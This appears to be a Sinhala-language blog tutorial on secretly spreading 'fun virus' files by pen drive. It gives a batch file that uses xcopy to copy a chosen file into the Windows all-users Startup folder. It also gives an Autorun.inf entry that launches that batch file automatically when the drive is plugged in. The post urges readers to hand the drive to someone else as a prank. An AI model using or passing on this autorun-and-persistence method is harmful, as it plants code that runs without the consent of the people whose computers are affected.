Wednesday, April 02, 2025

Breaking News

වෛරස් ෆයිල් එකක් හොරෙන්ම Pen එකෙන් Windows Startup Folder එකට Copy කරමුද?


          ඔන්න තවත් පොඩි වැඩක් අරන් ආව.මේක පොඩි ආතල් වැඩක්. කලින් ෆන් වෛරස් වගයක් දුන්න මතකයිනෙ නේද? දැන් ඉතින් අපි කට්ටියට Pen  එකෙන් බෙදල දෙමු ඒ ටික.

ෆන් වෛරස් කෝඩ් ටික මෙතනින් ගන්න.

මුලින්ම අපි ෆයිල් කොපි කරන්න ඕන bat ෆයිල් එක හදාගමු එහෙනම්. ඔන්න ඔය පහල තියන කෝඩ් එක නෝට්පෑඩ් එකේ ටයිප් කරගෙන කැමති නමකින් සේව් කරගන්න. සේව් කරනකොට නමේ අගට .bat කියල දෙන්න.

xcopy [ෆයිල් එකේ නම.bat] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

 [ෆයිල් එකේ නම.bat] මේ විදියට දීල තියන තැන ඔයාට කොපි කරන්න ඕන ෆයිල් එකේ නම දෙන්න. අගට .bat කියල දෙන්න අමතක කරන්න එපා.

මතක තියාගන්න ඔයා කොපි කරන ෆයිල් එකයි මේ හදපු bat ෆයිල් එකයි එක ලඟ තියෙන්න ඕනෙ. Pen එකේ ෆොල්ඩර් එකක් හදල ඒක ඇතුලට දාන්නකො ෆයිල් දෙකම.

දැන් අපි මේකට Autorun ෆයිල් එකකුත් හදමු. පහල තියන කෝඩ් එක නෝට්පෑඩ් එකේ ටයිප් කරගන්න.

[autorun]
open= [ෆෝල්ඩර් එකේ නම] / [ෆයිල් එකේ නම]

[ෆෝල්ඩර් එකේ නම] මෙතනට ඔයා හදපු ෆෝල්ඩර් එකේ නම දෙන්න. [] දාන්න එපා.
[ෆයිල් එකේ නම] මෙතනට bat ෆයිල් එකේ නම දෙන්න. අගට .bat කියල දෙන්නත් අමතක කරන්න එපා.

මේක සේව් කරනකොට Autorun.inf කියල නම දෙන්න. එකත් පෙන් එකට කොපි කරගන්න. මේක තියෙන්න ඕනෙ ඔයා හදපු ෆෝල්ඩර් එකෙන් එලියෙ. පෙන් එකේ කිසිම ෆෝල්ඩර් එකකට දාන්නෙ නැතුව නිකන් එලියෙන්ම තියන්න.

එහෙනම් හරිනෙ. කාටහරි දීල පොඩි ආතල් එකක් ගන්න. ෆන් වෛරස් ටික මෙතනින් ගන්න.

ට්‍රයි කරල බලල ප්‍රශ්න තියනම් අහන්න. එහෙනම් මම ගියා. ජය වේවා.....!

හොඳ නරක කියල කෙමන්ට් එකකුත් දාලම යන්න.

Join Now - 100% Sure

Ref_banner 468

1 comment:

ඔයලගෙ අදහස් කමෙන්ට් කරල අපට කියන්න.ඒක අපට ගොඩක් වටිනවා.....

Designed By Published.. Blogger Templates